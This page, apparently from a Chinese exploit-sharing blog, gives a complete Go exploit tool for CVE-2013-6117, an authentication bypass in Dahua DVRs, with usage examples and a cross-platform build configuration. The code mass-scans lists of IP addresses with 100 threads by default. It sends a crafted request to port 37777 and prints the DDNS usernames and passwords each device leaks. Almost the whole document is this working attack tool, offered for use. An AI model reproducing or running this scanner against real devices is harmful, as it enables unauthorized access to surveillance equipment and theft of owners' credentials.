CVE-2013-6117_Dahua_DVR_2.608.0000.0_and_2.608.GV00.0_身份驗證繞過漏洞

# CVE-2013-6117 Dahua DVR 2.608.0000.0 and 2.608.GV00.0 身份驗證繞過漏洞
==Usage==

$ ./CVE-2013-6117 -h
Options:

  -h, --help       display help information
  -f, --filename   File containing list of IP addresses
  -t, --target     Target IP
  -n, --threads    No of concurrent threads (default: 100)
$ ./CVE-2013-6117 -f hostfile.txt 
1.2.4.4|name.no-ip.org:80|username|password
$ ./CVE-2013-6117 -t 1.2.3.4
1.2.4.4|name.no-ip.org:80|username|password

==CVE-2013-6117.go==

package main
import (
    "net"
    "os"
    "strings"
    "fmt"
    "sync"
    "bufio"
    "time"
    "github.com/mkideal/cli"
)
func readLines(path string) ([]string, error) {
  file, err := os.Open(path)
  if err != nil {
    return nil, err
  }
  defer file.Close()

  var lines []string
  scanner := bufio.NewScanner(file)
  for scanner.Scan() {
    lines = append(lines, scanner.Text())
  }
  return lines, scanner.Err()
}
func getData(servAddr string,data string) {
	tmpResult:=data
	if strings.Contains(tmpResult, "&&G4-IP DDNS&&"){
		s := strings.Split(tmpResult, "&&G4-IP DDNS&&")
		if  len(s)>0 {
			s := strings.Split(tmpResult, "&&G4-IP DDNS&&")[1]
			s1 := strings.Split(s, "&&")
			tmpip:=s1[0]
			tmpport:=s1[1]	
			ddns:=tmpip+":"+tmpport
			tmpusername:=s1[3]
			tmppassword:=s1[4]
			if len(tmpusername)>0 {
				fmt.Println(servAddr+"|"+ddns+"|"+tmpusername+"|"+tmppassword)
			}			
		}
	}	
	if strings.Contains(tmpResult, "&&NO-IP DDNS&&"){
		s := strings.Split(tmpResult, "&&NO-IP DDNS&&")
		if  len(s)>0 {
			s := strings.Split(tmpResult, "&&NO-IP DDNS&&")[1]
			s1 := strings.Split(s, "&&")
			tmpip:=s1[0]
			tmpport:=s1[1]	
			ddns:=tmpip+":"+tmpport
			tmpusername:=s1[3]
			tmppassword:=s1[4]
			if len(tmpusername)>0 {
				fmt.Println(servAddr+"|"+ddns+"|"+tmpusername+"|"+tmppassword)
			}			
		}
	}	
	if strings.Contains(tmpResult, "&&Dyndns DDNS&&"){
		s := strings.Split(tmpResult, "&&Dyndns DDNS&&")
		if  len(s)>0 {
			s := strings.Split(tmpResult, "&&Dyndns DDNS&&")[1]
			s1 := strings.Split(s, "&&")
			tmpip:=s1[0]
			tmpport:=s1[1]	
			ddns:=tmpip+":"+tmpport
			tmpusername:=s1[3]
			tmppassword:=s1[4]
			if len(tmpusername)>0 {
				fmt.Println(servAddr+"|"+ddns+"|"+tmpusername+"|"+tmppassword)
			}		
		}
	}
}
func connect(urlChan chan string) {
    for servAddr := range urlChan {
		strEcho := "\xa3\x00\x00\x00\x00\x00\x00\x00\x63\x6f\x6e\x66\x69\x67\x00\x00\x8c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
		tcpAddr, err := net.ResolveTCPAddr("tcp", servAddr+":37777")
		if err == nil {
			var timeoutSec=5
			timeout := time.Duration(time.Duration(timeoutSec) * time.Second)
		
			d := net.Dialer{Timeout: timeout}
			conn, err := d.Dial("tcp", servAddr+":37777")    	
		
			if err == nil {
				_, err = conn.Write([]byte(strEcho))
				if err == nil {
					reply := make([]byte, 1024)
					_, err = conn.Read(reply)
					if err == nil {
						getData(servAddr,string(reply))
					}

				}
				conn.Close()
			} 
		}
		_=tcpAddr
	}
}
type argT struct {
	cli.Helper
	Filename string `cli:"f,filename" usage:"File containing list of IP addresses"`
	Targetip string `cli:"t,target" usage:"Target IP"`
	Threads int  `cli:"n,threads" usage:"No of concurrent threads (default: 100)"`
}

func main() {
    var workersCount=100
	var contentList []string
	cli.Run(new(argT), func(ctx *cli.Context) error {
		argv := ctx.Argv().(*argT)
		if len(argv.Filename)>0 {
			lines, err2 := readLines(argv.Filename)
			if err2==nil {
				for _, v := range lines {
					v=strings.TrimSpace(v)
					if len(v)>0 {
						contentList = append(contentList, v)
					}
				}		
			} else {
				fmt.Println(err2)
			}
			_ = err2				
		}
		if argv.Threads>0 {
			workersCount=argv.Threads
		}
		if len(argv.Targetip)>0 {
			contentList = append(contentList, argv.Targetip)
		}

		return nil
	})
	urlChan := make(chan string)
	var wg1 sync.WaitGroup
	wg1.Add(workersCount)

	for i := 0; i < workersCount; i++ {
		go func() {
  			defer wg1.Done()
  			connect(urlChan)
		}()
	}

	completed := 0
	for _, each := range contentList {
		urlChan <- each
		completed++
	}
	close(urlChan)	
	wg1.Wait()    
}

==goreleaser.yml==

build:
  main: ./CVE-2013-6117.go
  goos:
    - linux
    - darwin
    - windows
  goarch:
    - 386
    - amd64
    - arm
    - arm64
brew:
  github:
    owner: milo2012
    name: homebrew-tap
  folder: Formula

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容